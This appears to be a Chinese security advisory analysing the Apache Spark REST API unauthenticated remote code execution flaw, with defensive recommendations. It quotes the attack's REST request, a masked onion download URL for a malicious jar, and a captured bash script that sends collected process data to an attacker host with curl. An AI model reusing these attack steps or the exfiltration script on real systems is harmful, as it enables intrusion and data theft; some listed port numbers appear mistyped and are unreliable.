Apache Spark REST API 未授权RCE漏洞分析与防护指南<\/h1>

漏洞概述<\/h2>
2018年7月7日，阿里云安全团队首次捕获利用Apache Spark REST API未授权远程代码执行(RCE)漏洞的真实攻击样本。该漏洞允许攻击者无需认证即可通过REST API操作Spark，创建任务、删除任务、查看任务结果，最终获得执行任意指令的能力。<\/p>

漏洞背景<\/h2>
Apache Spark是专为大规模数据处理设计的快速通用计算引擎，由UC Berkeley AMP实验室开源。它提供了WEB UI图形化界面和REST API方便用户操作。Spark作为大数据"计算引擎"，一旦被攻破，企业的核心数据资产、计算能力和用户敏感数据都可能被窃取。<\/p>

漏洞详情<\/h2>

攻击流程还原<\/h3>

目标发现<\/strong>：攻击者通过web扫描发现暴露在公网的Spark webui服务<\/li>

漏洞利用<\/strong>：通过6066端口向REST API发送恶意请求
POST \/v1\/submissions\/create Host: xxxx.xxx.xx:6066 <\/code><\/pre> 攻击payload指示服务器从暗网下载恶意jar包(如https:\/\/xxxxxxxx.onion.plus\/SimpleApp.jar<\/code>)并执行<\/li> 恶意载荷分析<\/strong>：下载的jar包是一个简单的命令执行后门，执行时会从暗网下载并执行shell脚本<\/li> 脚本内容<\/strong>： #!\/bin\/bash <\/span><\/span><\/span><\/span>ps ax --sort=<\/span>-pcpu > \/tmp\/tmp.txt <\/span><\/span>curl -F "file=@\/tmp\/tmp.txt"<\/span> http:\/\/x.x.x.x\/re.php <\/span><\/span>rm -rf \/tmp\/tmp.txt <\/span><\/span><\/code><\/pre>该脚本收集系统性能信息并回传给攻击者<\/li> <\/ol> 漏洞影响范围<\/h3> 全网约5000台暴露8080端口的Spark服务器受影响<\/li> 攻击者可以批量接管存在权限问题的机器<\/li> 与Hadoop Yarn未授权访问漏洞原理和利用方法相似<\/li> <\/ul> 安全建议<\/h2> 网络层防护<\/h3> 使用iptables或安全组限制对以下端口的访问： 8088<\/li> 8081<\/li> 7707<\/li> 6606<\/li> <\/ul> <\/li> 如无必要，不要将接口开放在公网，改为本地或内网调用<\/li> <\/ol> 认证与访问控制<\/h3> YARN模式<\/strong>：使用Spark的yarn控制模式，并开启HTTP Kerberos对WEB UI进行访问控制<\/li> Standalone模式<\/strong>：自行实现访问控制的jar包<\/li> 设置spark.ui.filters<\/code>对WEB UI进行访问控制<\/li> <\/ul> <\/li> <\/ol> 其他防护措施<\/h3> 定期更新Spark到最新版本<\/li> 监控异常的网络连接和系统资源使用情况<\/li> 实施最小权限原则，限制Spark服务的运行权限<\/li> <\/ol> 未来趋势预测<\/h2> 随着加密货币经济发展，具有强大算力但安全能力较弱的分布式应用将面临更多攻击<\/li> Spark REST API漏洞可能很快被黑产用于挖矿等恶意活动<\/li> 使用"暗网"传播恶意后门的趋势可能会扩大<\/li> <\/ol> 总结<\/h2> Apache Spark REST API未授权漏洞是一个严重的安全威胁，可能导致整个集群被攻陷。企业应尽快评估自身风险，按照上述建议实施防护措施，特别是加强认证和网络访问控制，以保护大数据环境的安全。<\/p>